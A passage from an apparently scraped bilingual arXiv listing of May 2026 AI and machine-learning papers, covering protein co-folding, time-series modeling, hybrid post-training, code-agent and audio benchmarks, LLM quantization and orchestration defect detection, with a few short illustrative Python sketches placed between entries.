This paper argues that workflow closure is not scientific closure in auto-research systems. Current systems can increasingly complete research-like loops internally, moving from idea generation to experiment execution, writing, and self-evaluation. That achievement is real, but it does not by itself give the resulting outputs scientific standing. We argue that trustworthy auto-research should not aim for autonomous self-sufficiency, but should aim for autonomous execution under non-autonomous epistemic control. Based on a survey of more than 100 recent papers and repositories in this rapidly emerging area, together with a structured audit of 21 representative systems, we diagnose a recurring and structurally connected failure pattern: objective collapse, in which single-proxy targets replace multi-objective scientific aims; validation collapse, in which internal self-evaluation replaces independent validation; and acceptance collapse, in which benchmark scores or publication-shaped artifacts replace mechanisms for domain-level critique, reuse, and integration. These collapses are not inherent limits of autonomy but correctable design choices. Accordingly, we outline potential remedies across objective signal, validation, and output pathway to spark community discussion.

2605.26192 2026-05-27 cs.LG cs.AI q-bio.BM 版本更新

Co-folding model guided by structural proteomics

结构蛋白质组学引导的共折叠模型

Alon Shtrikman, Nitzan Simchi, Michal Ran Shchory, Sagie Brodsky, Eran Seger, Kirill Pevzner

发表机构 * Protai Bio(Protai生物)

AI总结 提出AIMS-Fold框架,通过整合XL-MS和HDX-MS实验数据与扩散模型,在推理时引导蛋白质复合物构象生成,提升诱导接近靶标的预测准确性。

详情
AI中文摘要

蛋白质结构生成模型擅长从序列预测单个蛋白质的静态结构,但通常无法捕捉蛋白质复合物的正确构象状态,这对蛋白质设计和诱导接近模式(如抗体和PROTACs)至关重要。虽然交联质谱(XL-MS)和氢氘交换质谱(HDX-MS)等结构蛋白质组学技术提供了有价值的空间和动态信息,但将这些稀疏、异质的测量整合到这些模型中仍然是一个开放的挑战。在这里,我们通过将结构蛋白质组学数据与预训练扩散模型学到的丰富生物物理先验相结合来弥合这一差距。我们引入了AIMS-Fold,一个推理时引导扩散框架,它使用源自XL-MS空间约束和HDX-MS溶剂可及性轮廓的可微物理势能主动引导生成采样轨迹。我们证明这些结构方法各自提高了预测准确性,并且它们的整合产生了协同改进。关键的是,通过利用这些实验约束,AIMS-Fold在具有挑战性的诱导接近靶标上比纯计算、无引导的最先进模型(如Boltz-2)实现了更高的准确性。这确立了我们的框架作为诱导接近药物基于结构的药物设计的强大整合计算方法。评估代码将在发表后公开。

英文摘要

Protein structure generative models excel at predicting single protein static structures from sequence, but routinely fail to capture the correct conformational state of protein complexes, critical for protein design and induced proximity modalities such as antibodies and PROTACs. While structural proteomics techniques like Cross-Linking Mass Spectrometry (XL-MS) and Hydrogen-Deuterium Exchange Mass Spectrometry (HDX-MS) offer valuable spatial and dynamic insights, integrating these sparse, heterogeneous measurements into these models remains an open challenge. Here, we bridge this gap by combining structural proteomics data with the rich biophysical priors learned by pretrained diffusion models. We introduce AIMS-Fold, an inference-time guided-diffusion framework that actively steers the generative sampling trajectory using differentiable physical potentials derived from XL-MS spatial restraints and HDX-MS solvent accessibility profiles. We demonstrate that these structural methods individually enhance predictive accuracy, and their integration yields synergistic improvement. Crucially, by leveraging these experimental restraints, AIMS-Fold achieves higher accuracy on challenging induced proximity targets than purely computational, unguided state-of-the-art models like Boltz-2. This establishes our framework as a powerful, integrative computational approach for the structure-based drug design of induced proximity drugs. Evaluation code will be made publicly available upon publication.

2605.26191 2026-05-27 cs.LG cs.AI 版本更新

Modeling Dynamic Mixtures of Time-Delay Systems from Streaming Time Series

从流式时间序列建模时滞系统的动态混合

Ren Fujiwara, Yasuko Matsubara, Yasushi Sakurai

发表机构 * SANKEN, The University of Osaka, Japan(日本大阪大学产业科学研究所)

AI总结 提出在线框架DelayMix,将流式时间序列视为时滞系统的动态混合,通过固定长度表示总结过去状态,利用马尔可夫参数张量捕捉动态和延迟,实现快速适应环境变化并降低内存使用。

Comments Accepted by IJCAI 2026

详情
AI中文摘要

本研究解决了具有清晰输入输出关系的时间序列数据流中的自适应建模问题。该问题具有挑战性,因为环境因素或输入延迟变化导致的快速系统变化(状态转移)会降低模型性能,并且在使用多个小模型处理每种时间序列模式时,需要在准确性、鲁棒性和内存使用之间进行权衡。为了解决这些问题,本文提出了一种在线框架/方法,将流式时间序列视为时滞系统的动态混合。该框架通过使用固定长度表示来总结过去的状态,该表示同时捕捉系统动态和输入输出延迟,从而保持模型跟踪的鲁棒性并减少内存使用。具体来说,该方法利用系统的马尔可夫参数序列构建一个摘要系统张量,同时捕捉动态行为和延迟特征。如有必要,张量分解算法从张量中提取相关的过去模型,并帮助选择最适合当前状态的系统。该方法能够快速适应环境变化,并且计算效率高。在真实数据集上的测试表明,DelayMix始终优于其他方法,实现了卓越的预测准确性和更快的延迟适应,特别是对于高度非平稳的数据。

英文摘要

This research addresses the problem of adaptive modeling in time-series data streams with clear input-output relationships. This problem is challenging because rapid system changes (regime shifts) caused by environmental factors or input delay changes degrade model performance, and a trade-off among accuracy, robustness, and memory usage arises when using multiple small models for each time-series pattern. To address these issues, this paper presents DelayMix, an online framework that treats streaming time series as dynamic mixtures of time-delay systems. This framework maintains robustness of model tracking and reduces memory usage by summarizing past regimes using a fixed-length representation that captures both the system dynamics and input-output delays. Concretely, this approach constructs a summary system tensor using the system's Markov parameter series, capturing both dynamic behavior and delay characteristics. If necessary, a tensor decomposition algorithm extracts relevant past models from the tensor and helps select the system that best fits the current regime. This method enables rapid adaptation to environmental changes and is computationally efficient. Tests on real datasets show that DelayMix consistently outperforms other methods, achieving superior forecast accuracy and faster adaptation to delays, especially for highly non-stationary data.
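
A system's Markov parameters (its impulse response) can encode both dynamics and input-output delay in one fixed-length sequence. The sketch below shows this for a scalar linear system; it is a minimal illustration, not the paper's tensor construction. It assumes the model `x[t+1] = a*x[t] + b*u[t-delay]`, `y[t] = c*x[t]`, and the function names are hypothetical. The k-th parameter is `c * a**(k-1-delay) * b` once the delay has elapsed and zero before that, so the number of leading zeros reveals the delay while the decay rate reveals the dynamics.

```python
def markov_parameters(a, b, c, delay, length):
    """First `length` Markov parameters of a delayed scalar linear system."""
    params = []
    for k in range(1, length + 1):
        lag = k - 1 - delay  # steps elapsed since the delayed input arrived
        params.append(c * (a ** lag) * b if lag >= 0 else 0.0)
    return params


def estimate_delay(params, tol=1e-9):
    """Read the delay off as the number of leading (near-)zero parameters."""
    for index, value in enumerate(params):
        if abs(value) > tol:
            return index
    return len(params)
```

Two regimes with the same dynamics but different delays therefore produce shifted copies of the same sequence, which is what makes a fixed-length summary of past regimes comparable.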

2605.26190 2026-05-27 cs.LG cs.AI eess.SP 版本更新

HRVConformer: Neonatal Hypoxic-Ischemic Encephalopathy Classification from the Heart Rate signals

HRVConformer:基于心率信号的新生儿缺氧缺血性脑病分类

Shuwen Yu, William P Marnane, Geraldine B. Boylan, Gordon Lightbody

发表机构 * University College Cork(科克大学学院) INFANT Research Centre(INFANT研究中心) Department of Electrical & Electronic Engineering(电气与电子工程系) School of Engineering and Architecture(工程与建筑学院) Pediatrics and Child Health(儿科学与儿童健康)

AI总结 提出HRVConformer,一种混合卷积-Transformer深度学习架构,直接从原始心率信号端到端分类新生儿缺氧缺血性脑病,在测试集上达到83.23% AUC和74.56%准确率,优于Transformer、ResNet50等基线。

Comments Paper submitted to Journal of Engineering Applications of Artificial Intelligence

详情
AI中文摘要

本文提出了HRVConformer,一种新颖的深度学习架构,用于使用瞬时心率(HR)信号对缺氧缺血性脑病(HIE)进行分类。与依赖手工特征的常规方法不同,HRVConformer以端到端方式直接处理原始HR信号,通过混合卷积-Transformer框架捕获局部和长距离依赖关系。通过集成用于局部特征提取的卷积层和用于全局上下文建模的基于Transformer的注意力机制,该架构有效增强了信号表示和分类性能。该模型使用监督学习在包含1,573个一小时时段的大型HR数据集上训练,其中包括259个专家标注的一小时时段和大量弱标注数据。一个314小时的验证集提供了稳健的性能估计,而一个独立的215小时专家标注数据集被保留用于最终测试。使用改进的Pan-Tompkins算法从心电图(ECG)记录中提取HR信号,该算法显著提高了信号质量和数据可用性。实验结果表明,HRVConformer在测试集上实现了83.23%的AUC和74.56%的准确率。这些结果超越了Transformer、ResNet50和全卷积网络基线,突显了集成卷积和Transformer组件用于基于HR的HIE分类的优势。所提出的方法为使用HR信号实现更准确和自动化的HIE评估提供了有希望的一步。代码可在https://github.com/syu-kylin/HRVConformer获取。

英文摘要

This paper presents the HRVConformer, a novel deep learning architecture for the classification of hypoxic-ischemic encephalopathy (HIE) using the instantaneous heart rate (HR) signal. Unlike conventional approaches that rely on handcrafted features, HRVConformer directly processes raw HR signals in an end-to-end manner, capturing both local and long-range dependencies through a hybrid Convolution-Transformer framework. By integrating convolutional layers for local feature extraction and Transformer-based attention mechanisms for global context modelling, the architecture effectively enhances signal representation and classification performance. The model was trained using supervised learning on a large HR dataset consisting of 1,573 one-hour epochs, including 259 one-hour expert-annotated epochs and a substantial set of weakly labelled data. A 314-hour validation set provided a robust performance estimation, while an independent 215-hour dataset with expert annotations was reserved for final testing. HR signals were extracted from electrocardiogram (ECG) recordings using an improved Pan-Tompkins algorithm, which significantly enhanced both signal quality and data availability. Experimental results demonstrate that the HRVConformer achieves an AUC of 83.23% and an accuracy of 74.56% on the test set. These results surpass the performance of the Transformer, ResNet50, and fully convolutional network baselines, highlighting the advantages of integrating convolutional and Transformer-based components for HR-based HIE classification. The proposed method provides a promising step toward a more accurate and automated assessment of HIE using HR signals. The code is available at: https://github.com/syu-kylin/HRVConformer.

2605.26184 2026-05-27 cs.LG cs.AI 版本更新

GAC: Noise-Aware Adaptive Mixing for Hybrid SFT-RL Post-Training

GAC: 面向混合SFT-RL后训练的噪声感知自适应混合

Yuelin Hu, Zhenbo Yu, Zhengxue Cheng, Wei Liu, Li Song

发表机构 * Shanghai Jiao Tong University(上海交通大学) Shanghai Maritime University(上海海事大学)

AI总结 提出噪声感知控制器GAC,通过在线估计梯度方差和两个训练信号之间的不一致性,自适应调整混合权重,以改进混合后训练性能。

Comments 15 pages, 3 figures, 22 tables

详情
AI中文摘要

混合后训练通常结合监督微调和强化学习,但固定的混合调度无法适应两种信号相对噪声随时间变化的情况。我们提出GAC,一种噪声感知控制器,通过在线估计梯度方差和两个训练信号之间的不一致性,推导出自适应混合权重。该方法在重用现有训练张量的同时,增加了平滑、先验指导和有界更新。在数学、代码、科学和逻辑基准上的实验表明,与强固定和基于规则的基线相比,GAC持续改进混合后训练,在更大模型规模下获得更大收益,且训练开销小于1%。

英文摘要

Hybrid post-training usually combines supervised fine-tuning and reinforcement learning, but fixed mixing schedules cannot adapt when the relative noise of the two signals changes over time. We propose GAC, a noise-aware controller that derives an adaptive mixing weight from online estimates of gradient variance and disagreement between the two training signals. The method adds smoothing, prior guidance, and bounded updates while reusing existing training tensors. Experiments on math, code, science, and logic benchmarks show that GAC consistently improves hybrid post-training over strong fixed and rule-based baselines, with larger gains at larger model scales and less than 1% training overhead.
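
One way to picture a noise-aware mixing controller is inverse-variance weighting followed by the three stabilizers the abstract names: prior guidance, smoothing, and bounded updates. The sketch below is a hypothetical illustration, not GAC itself: the formula, the function name, and every default value are assumptions, and it omits the disagreement signal between the two training signals that the abstract also mentions.

```python
def adaptive_mixing_weight(prev_weight, sft_var, rl_var, prior=0.5,
                           prior_strength=0.1, smoothing=0.9, max_step=0.05):
    """Return the next SFT mixing weight in [0, 1]; the RL weight is 1 minus it."""
    eps = 1e-12  # guards against division by zero for a noiseless signal
    inv_sft = 1.0 / (sft_var + eps)
    inv_rl = 1.0 / (rl_var + eps)
    # Inverse-variance target: trust the less noisy gradient signal more.
    target = inv_sft / (inv_sft + inv_rl)
    # Prior guidance: pull the target toward a preset default weight.
    target = (1.0 - prior_strength) * target + prior_strength * prior
    # Smoothing: exponential moving average with the previous weight.
    proposed = smoothing * prev_weight + (1.0 - smoothing) * target
    # Bounded update: limit how far the weight can move in one step.
    step = max(-max_step, min(max_step, proposed - prev_weight))
    return min(1.0, max(0.0, prev_weight + step))
```

The combined loss would then be `w * sft_loss + (1 - w) * rl_loss`, with `w` recomputed from running gradient-variance estimates at each step.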

2605.26182 2026-05-27 cs.AI cs.GR 版本更新

BrickAnything: Geometry-Conditioned Buildable Brick Generation with Structure-Aware Tokenization

BrickAnything: 基于几何条件的可构建砖块生成与结构感知标记化

Zhengyang Ni, Feng Yan, Yu Guo, Fei Wang

发表机构 * Xi’an Jiaotong University(西安交通大学) State Key Laboratory of Human-Machine Hybrid Augmented Intelligence(人机混合增强智能国家重点实验室) Institute of Artificial Intelligence and Robotics(人工智能与机器人研究院)

AI总结 提出BrickAnything,一个基于几何条件的自回归框架,通过结构感知树标记化生成满足装配约束和结构稳定性的砖块结构。

详情
AI中文摘要

从3D形状生成物理可构建的砖块结构不仅需要几何重建,输出还必须满足离散零件约束和结构稳定性。现有的砖块生成方法要么依赖启发式优化,当目标3D形状在预定义约束下无法实现可行结构时可能失败;要么生成砖块序列而不显式建模底层3D几何和装配关系。在这项工作中,我们提出了BrickAnything,一个基于几何条件的自回归框架,用于从多样的3D表示生成可构建的砖块结构。BrickAnything使用点云作为统一的几何接口,并预测在装配约束下重建目标形状的砖块序列。为了建模砖块之间的结构依赖性,我们引入了结构感知树标记化,通过局部附着关系表示砖块结构。这种公式使序列生成更符合物理构建过程,并减少无效中间状态。我们进一步引入了基于偏好的对齐后训练、有效性约束解码和自适应回滚,以改善可构建性目标,如稳定性和几何保真度。大量实验表明,BrickAnything生成几何忠实且物理可实现的砖块结构,并且与传统的排序策略相比,所提出的标记化有效减少了回滚和重新生成。

英文摘要

Generating physically buildable brick structures from 3D shapes requires more than geometric reconstruction: the output must also satisfy discrete part constraints and structural stability. Existing brick generation methods either rely on heuristic optimization, which can break down when the target 3D shape does not admit a feasible structure under predefined constraints, or generate brick sequences without explicitly modeling the underlying 3D geometry and assembly relations. In this work, we present BrickAnything, a geometry-conditioned autoregressive framework for generating buildable brick structures from diverse 3D representations. BrickAnything uses point clouds as a unified geometric interface and predicts brick sequences that reconstruct the target shape under assembly constraints. To model structural dependencies among bricks, we introduce a structure-aware tree tokenization, which represents brick structures through local attachment relations. This formulation makes sequence generation more consistent with the physical construction process, and reduces invalid intermediate states. We further introduce preference-based alignment post-training, validity-constrained decoding and adaptive rollback to improve buildability objectives such as stability and geometric fidelity. Extensive experiments demonstrate that BrickAnything produces geometrically faithful and physically realizable brick structures, and that the proposed tokenization effectively reduces rollback and regeneration compared with conventional ordering strategies.

2605.26177 2026-05-27 cs.SE cs.AI 版本更新

RepoMirage: Probing Repository Context Reasoning in Code Agents with Perturbations

RepoMirage: 通过扰动探测代码智能体的仓库上下文推理

Hanyu Li, Yichi Zhang, Speed Zhu, Hang Su, Jun Zhu, Yinpeng Dong

发表机构 * Beijing University of Posts and Telecommunications(北京邮电大学) Tsinghua University(清华大学) Tencent(腾讯)

AI总结 提出RepoMirage评估套件,通过语义保持的仓库级扰动和扩展任务,揭示代码智能体在仓库上下文推理中的显著缺陷,并基于结构优先的原型工作流RepoAnchor展示改进。

详情
AI中文摘要

代码智能体目前在仓库级软件工程基准上表现出色,但尚不清楚端到端任务(如问题解决)的成功是否真正反映了仓库上下文推理——即跨多个文件识别任务相关信息并推理其间关系的能力。为探究此问题,我们引入RepoMirage,这是一个基于SWE-Bench Verified构建的两阶段评估套件,采用扰动作为诊断工具,通过改变仓库的暴露方式来增加对上下文推理的需求。首先,RepoMirage-Perturb应用三种语义保持的仓库级扰动,揭示当正确求解需要更广泛的上下文访问时,性能明显下降。RepoMirage-Extend进一步将扰动针对的结构瓶颈转化为问题解决之外的显式任务,平均性能从原始设置的66.8%下降到25.3%,表明仓库上下文推理存在显著缺陷。进一步的轨迹分析揭示了探索漂移,即智能体访问更广泛的仓库上下文但未能将其转化为有效的结构信息。受此观察启发,我们提出RepoAnchor,一种结构优先的原型工作流,将仓库探索与下游问题解决分离,并表明显式的结构支撑带来了显著收益。这些结果揭示了代码智能体在仓库上下文推理中一个先前被忽视的差距,并表明更强的结构感知方法有潜力改进它们。

英文摘要

Code agents currently perform well on repository-level software engineering benchmarks, but it remains unclear whether success on end-to-end tasks such as issue resolution truly reflects repository context reasoning, the ability to identify the task-relevant information across multiple files and reason over the relations among them. To investigate this question, we introduce RepoMirage, a two-stage evaluation suite built on SWE-Bench Verified that adopts perturbation as a diagnostic tool to increase the demand for context reasoning by transforming how the repository is exposed. First, RepoMirage-Perturb applies three types of semantics-preserving repository-level perturbations, revealing a clear performance drop when correct solving requires broader context access. RepoMirage-Extend further turns perturbation-targeted structural bottlenecks into explicit tasks beyond issue resolution, where the average performance declines from 66.8% in the original setting to 25.3%, indicating a significant deficiency in repository context reasoning. Further trajectory analysis reveals an exploration drift, where agents access broader repository context but fail to turn it into effective structure information. Motivated by this observation, we propose RepoAnchor, a structure-first prototype workflow that separates repository exploration from downstream problem solving, and show that explicit structural scaffolding yields notable gains. These results uncover a previously overlooked gap in repository context reasoning for code agents and suggest that stronger structure-aware methods have the potential to improve them.

2605.26176 2026-05-27 cs.SD cs.AI 版本更新

PitchBench: Measuring Pitch Hearing in Audio-Language Models

PitchBench: 测量音频-语言模型中的音高听觉能力

Milan Liessens Dujardin, Song-Ze Yu, Craver Corbyn Thomas-Smith, David M. Chan, Karina Nguyen

发表机构 * University of California, Berkeley(加州大学伯克利分校) Thoughtful Lab

AI总结 提出PitchBench评估套件,通过28个实验系统测量音频-语言模型在绝对和相对音高感知上的表现,发现当前模型在不同声源、音长和格式下音高感知不可靠。

Comments Preprint

详情
AI中文摘要

音频-语言模型(ALMs)越来越多地用于需要理解音乐的实际应用,从音乐辅导和转录到字幕、推荐系统和音乐制作。更广泛地说,它们正在成为多模态AI系统的重要组成部分,这些系统必须从感官输入而非仅文本进行推理。这使得可靠的音乐感知成为关键前提:如果模型无法准确听到声音的结构,就不能信任它来推理、教学、转录或对现实世界中的音频采取行动。然而,现有的基准测试很少评估这种感知背后最基本的音乐能力之一:音高听觉。当前的评估往往通过更高层次的任务间接探测音高听觉,且通常采用多项选择格式,这留下了ALMs在不同乐器、声学条件和响应格式下识别细粒度音高的可靠性问题。我们引入了PitchBench,一个系统测量ALMs音高听觉的评估套件。PitchBench包含28个实验,涵盖序列和和弦中的绝对和相对音高感知,同时变化响度、音符时长、声源、时间拉伸、背景噪声和其他声学条件。任务范围从识别孤立音高到在四声部音乐织体中跟踪旋律线。评估前沿ALMs,我们发现音高听觉仍然非常不可靠:模型在不同设置下表现持续不佳,准确率随声源、音符时长和记谱格式急剧变化。当前的ALMs尚未具备稳定的音高感知,即使对于受控的合成和乐器刺激也是如此。除了基准测试,我们还发布了PitchBench作为Python包,包含评估数据和数据生成工具,以支持未来关于音高感知音频-语言建模的工作。

英文摘要

Audio-language models (ALMs) are increasingly used in real-world applications that require understanding music, from music tutoring and transcription to captioning, recommendation systems, and music production. More broadly, they are becoming an important component of multimodal AI systems that must reason from sensory input rather than text alone. This makes reliable musical perception a critical prerequisite: if a model cannot accurately hear the structure of sound, it cannot be trusted to reason about, teach, transcribe, or act on audio in the real world. Yet existing benchmarks rarely assess one of the most fundamental musical abilities underlying such perception: pitch hearing. Current evaluations tend to probe pitch hearing only indirectly, through higher-level tasks and often in multiple-choice formats, leaving open how reliably ALMs identify fine-grained pitch across instruments, acoustic conditions, and response formats. We introduce PitchBench, an evaluation suite that systematically measures pitch hearing in ALMs. PitchBench comprises 28 experiments spanning absolute and relative pitch perception within sequences and chords, while varying loudness, note duration, sound source, time stretching, background noise, and other acoustic conditions. Tasks range from identifying individual pitches in isolation to tracking a melodic line within a four-part musical texture. Evaluating frontier ALMs, we find that pitch hearing remains highly unreliable: models perform consistently poorly across settings, with accuracy varying sharply by sound source, note duration, and notation format. Current ALMs do not yet possess stable pitch perception, even for controlled synthetic and instrumental stimuli. Alongside the benchmark, we release PitchBench as a Python package containing the evaluation data and data generation tools to support future work on pitch-aware audio-language modeling.

2605.26175 2026-05-27 cs.LG cs.AI 版本更新

InfoQuant: Shaping Activation Distributions for Low-Bit LLM Quantization

InfoQuant:为低比特LLM量化塑造激活分布

Ke Li, Dong An, Xiaoling Zang, Can Ye, Liang Xie, Qibo Qiu, Chen Shen, Xiaofei He, Wenxiao Wang

发表机构 * School of Software Technology, Zhejiang University(浙江大学软件学院) Ant Group(蚂蚁集团) College of Computer Science and Technology, Zhejiang University of Technology(浙江工业大学计算机科学与技术学院) China Mobile (Zhejiang) Research & Innovation Institute(中国移动(浙江)研究院) Alibaba Cloud Computing(阿里云计算) State Key Lab of CAD&CG, Zhejiang University(浙江大学CAD&CG国家重点实验室)

AI总结 针对低比特激活量化中分布与量化器不匹配的问题,提出基于信息论的分析和无需训练的峰值抑制正交变换(PSOT)方法,显著提升量化精度。

详情
AI中文摘要

低比特激活量化仍然是高效大语言模型(LLM)部署的主要瓶颈。难点不仅在于激活值包含异常值,还在于其分布通常与低比特均匀量化器不匹配。现有的训练后量化(PTQ)方法抑制峰值、平衡通道或最小化重建误差,但很少明确说明什么样的激活分布实际上易于离散化。因此,激活值可能在数值上更平滑,但仍会产生较大的量化误差,因为量化范围仍然很宽,或者大多数值坍缩到均值附近的几个水平。我们将激活变换重新表述为面向量化器的分布设计,并从信息论角度分析量化误差。我们的分析表明,有利于量化的激活值应同时具有较小的数值范围和在该范围内的足够分散性。在此分析指导下,我们提出InfoQuant,一种无需训练的方法,采用峰值抑制正交变换(PSOT)将激活值塑造成更有利于量化的分布。我们进一步引入自适应异常值标记选择,以提高PSOT在优化过程中的鲁棒性。在多个LLM家族中,InfoQuant始终优于先前的PTQ和端到端训练基线。在W4A4KV4下,它平均保留了97%的浮点精度,并将LLaMA-2 13B的性能差距较先前最先进方法缩小了42%。代码可在[https://github.com/LLIKKE/InfoQuant](https://github.com/LLIKKE/InfoQuant)获取。

英文摘要

Low-bit activation quantization remains a major bottleneck in efficient large language model (LLM) deployment. The difficulty is not only that activations contain outliers, but that their distributions are often poorly matched to a low-bit uniform quantizer. Existing post-training quantization (PTQ) methods suppress peaks, balance channels, or minimize reconstruction error, yet they rarely specify what activation distribution is actually easy to discretize. As a result, activations may appear numerically smoother while still incurring large quantization error because the quantization range remains wide or most values collapse into a few levels near the mean. We recast activation transformation as quantizer-facing distribution design and analyze quantization error from an information-theoretic perspective. Our analysis shows that quantization-friendly activations should jointly have a smaller numerical range and sufficient dispersion within that range. Guided by this analysis, we propose InfoQuant, a training-free method that employs Peak Suppression Orthogonal Transformation (PSOT) to shape activations into more quantization-friendly distributions. We further introduce adaptive outlier-token selection to improve the robustness of PSOT during optimization. Across multiple LLM families, InfoQuant consistently outperforms prior PTQ and end-to-end training baselines. Under W4A4KV4, it preserves 97% of floating-point accuracy on average and reduces the LLaMA-2 13B performance gap by 42% over the previous state of the art. Code is available at [https://github.com/LLIKKE/InfoQuant](https://github.com/LLIKKE/InfoQuant).
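
The claim that a wide range makes most values collapse into a few quantization levels can be illustrated with a toy experiment. The sketch below is not InfoQuant or PSOT; it only applies a plain min/max 4-bit uniform quantizer to synthetic Gaussian "activations", with and without a single large outlier. The data, the outlier value 50.0, and all function names are assumptions made for illustration.

```python
import random

def uniform_quantize(values, bits):
    """Quantize to 2**bits evenly spaced levels over [min, max], then dequantize."""
    lo, hi = min(values), max(values)
    step = (hi - lo) / (2 ** bits - 1)
    codes = [round((v - lo) / step) for v in values]
    return codes, [lo + c * step for c in codes]

def mse(a, b):
    """Mean squared error between two equal-length sequences."""
    return sum((x - y) ** 2 for x, y in zip(a, b)) / len(a)

random.seed(0)
# Toy "activations": a well-spread vector, and the same vector plus one large outlier.
spread = [random.gauss(0.0, 1.0) for _ in range(1000)]
with_outlier = spread + [50.0]

codes_spread, deq_spread = uniform_quantize(spread, bits=4)
codes_outlier, deq_outlier = uniform_quantize(with_outlier, bits=4)

mse_spread = mse(spread, deq_spread)
mse_outlier = mse(with_outlier, deq_outlier)
levels_spread = len(set(codes_spread))    # distinct levels actually occupied
levels_outlier = len(set(codes_outlier))

print(f"spread:  mse={mse_spread:.4f}, levels used={levels_spread}")
print(f"outlier: mse={mse_outlier:.4f}, levels used={levels_outlier}")
```

With the outlier present, the quantization step grows with the range, so the bulk of the values lands on only a handful of levels and the error rises. This is the range-versus-dispersion tension the abstract describes.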

2605.26174 2026-05-27 cs.SE cs.AI cs.CL cs.MA 版本更新

A Universal Cliff and a Design Fingerprint: Cross-Section Defect Detection Under LLM Orchestration

一个通用悬崖与一个设计指纹:LLM编排下的跨段缺陷检测

Hiroki Fukui

发表机构 * Research Institute of Criminal Psychiatry(刑事精神病研究机构) Sex Offender Medical Center(性犯罪医疗中心) Department of Neuropsychiatry, Graduate School of Medicine, Kyoto University(京都大学医学研究生院神经精神病学部门)

AI总结 本研究揭示在LLM编排下,所有模型检测跨段矛盾缺陷的能力大幅下降(检测率降低三分之二以上),并发现不同对齐范式下的模型行为差异,其中一家开发商的模型随对齐增强呈现报告标准偏移。

Comments 24 pages, 2 figures. Data and code: doi:10.5281/zenodo.20372696

详情
AI中文摘要

生产级语言模型系统通过将请求分解为不可见的编排工作代理(这些代理重新组合成一份综合报告)来回答请求。我们探究这对一类单个代理无法察觉的缺陷——文档中两个远距离段落之间关系的矛盾——有何影响。保持文档、缺陷、机制、评分和种子不变,我们仅改变模型:来自同一开发商的五代的十个系统,以及来自不同对齐范式的五个提供商。 两个层次分离。首先,一个通用检测悬崖:每个在单代理下能发现这些跨段缺陷的模型,在编排下失去该能力,检测率在所有测试的范式中下降三分之二或更多。该悬崖源于机制,无法通过规模或扩展推理弥补。其次,模型跌落后的行为方式。信号检测分解显示,在六个高于随机水平的判别模型中,只有一家开发商的模型沿报告标准轴移动:随着对齐增强,模型漏检更少缺陷,但在干净文档上引发更多误报——这是同一标准偏移的两个方面,在该开发商内部随代际缩放(p < 0.001),而在其他地方几乎不存在。 在底层,漏检的缺陷往往并非不可见:模型的私有记录准确重构了结构故障,而综合报告却确认其完好,其关注点放在工件和缺失的合作者上。这难以量化——自动评判不稳定(精确率17-50%),关键词也无法将其与普通同意区分——我们将这种抵抗作为一项发现报告。我们发布所有运行、探针、缺陷密钥、评分提示和脚本。综合报告的置信度对跨分区缺陷无信息量,最对齐的系统并非最安全,而悬崖是结构性的。

英文摘要

Production language-model systems answer a request by partitioning it across an invisible orchestration of worker agents that recompose one integrated report. We ask what this does to a class of defect no single worker can see: a contradiction in the relation between two distant sections of a document. Holding the documents, defects, mechanism, scoring, and seed fixed, we vary only the model -- ten systems across five generations from one developer and five providers from distinct alignment paradigms. Two layers separate. First, a universal detection cliff: every model that finds these cross-section defects under a single agent loses that ability under orchestration, detection falling two-thirds or more across every paradigm tested. The cliff is mechanism-derived and not closed by scale or extended reasoning. Second, how models behave once fallen. A signal-detection decomposition shows that, among the six models discriminating above chance, only one developer's generations move along the reporting-criterion axis: as alignment is strengthened, the model misses fewer defects yet raises more false alarms on clean documents -- two faces of one criterion shift, scaling with generation within that developer (p < 0.001) and near-absent elsewhere. At the floor the missed defect is often not out of view: the model's private record reconstructs the structural fault accurately, while the integrated report signs off on its soundness, its concern spent on the artifact and an absent collaborator. This resists quantification -- an automated judge is unstable (precision 17-50%) and keywords cannot separate it from ordinary agreement -- a resistance we report as a finding. We release all runs, probes, defect keys, scorer prompts, and scripts. An integrated report's confidence is uninformative about partition-spanning defects, the most aligned systems are not the safest, and the cliff is structural.
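
The signal-detection decomposition mentioned above separates how well a model discriminates defective from clean documents (sensitivity, d') from how readily it reports a defect (criterion, c). A minimal sketch of the standard equal-variance Gaussian formulas follows. The counts are invented for illustration and are not taken from the paper, and the log-linear correction is one common convention that the authors may or may not use.

```python
from statistics import NormalDist

def sdt_decompose(hits, misses, false_alarms, correct_rejections):
    """Return (d_prime, criterion) under the equal-variance Gaussian model."""
    # Log-linear correction keeps both rates strictly between 0 and 1.
    hit_rate = (hits + 0.5) / (hits + misses + 1)
    fa_rate = (false_alarms + 0.5) / (false_alarms + correct_rejections + 1)
    z = NormalDist().inv_cdf
    d_prime = z(hit_rate) - z(fa_rate)            # discrimination ability
    criterion = -0.5 * (z(hit_rate) + z(fa_rate))  # lower means more willing to report
    return d_prime, criterion

# Hypothetical counts for two model generations (not data from the paper).
d_old, c_old = sdt_decompose(hits=20, misses=80, false_alarms=5, correct_rejections=95)
d_new, c_new = sdt_decompose(hits=40, misses=60, false_alarms=15, correct_rejections=85)

print(f"older: d'={d_old:.2f}, c={c_old:.2f}")
print(f"newer: d'={d_new:.2f}, c={c_new:.2f}")
```

In this made-up example the newer generation misses fewer defects and raises more false alarms while d' stays roughly constant, so the change is a shift in criterion and not a gain in discrimination.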

2605.26167 2026-05-27 cs.LG cs.AI math.DS math.RA 版本更新

Planning Neural Dynamics with Lie Group Embedding through Supervised Projective Manifold Learning

通过监督投影流形学习进行李群嵌入的神经动力学规划

Tianwei Wang, Bryan Chen, Qian Zuo, Qiyue Xia, Xin Li, Wei Pang

发表机构 * School of Informatics(信息学院) School of Mathematics(数学学院) University of Edinburgh(爱丁堡大学) School of Computer Science(计算机科学学院) School of MACS(MACS学院) Beijing Institute of Technology(北京理工大学) Heriot-Watt University(赫瑞-瓦特大学)

AI总结 提出李群嵌入动力神经网络(LieEDNN),通过梯度下降和流形上的度量投影实现可学习且稳定的动力学,解决李群与神经网络加法不兼容及非线性表示空间中的演化问题,并在SE(3)伸缩机械臂上验证。

Comments Preprint. Under review

详情
AI中文摘要

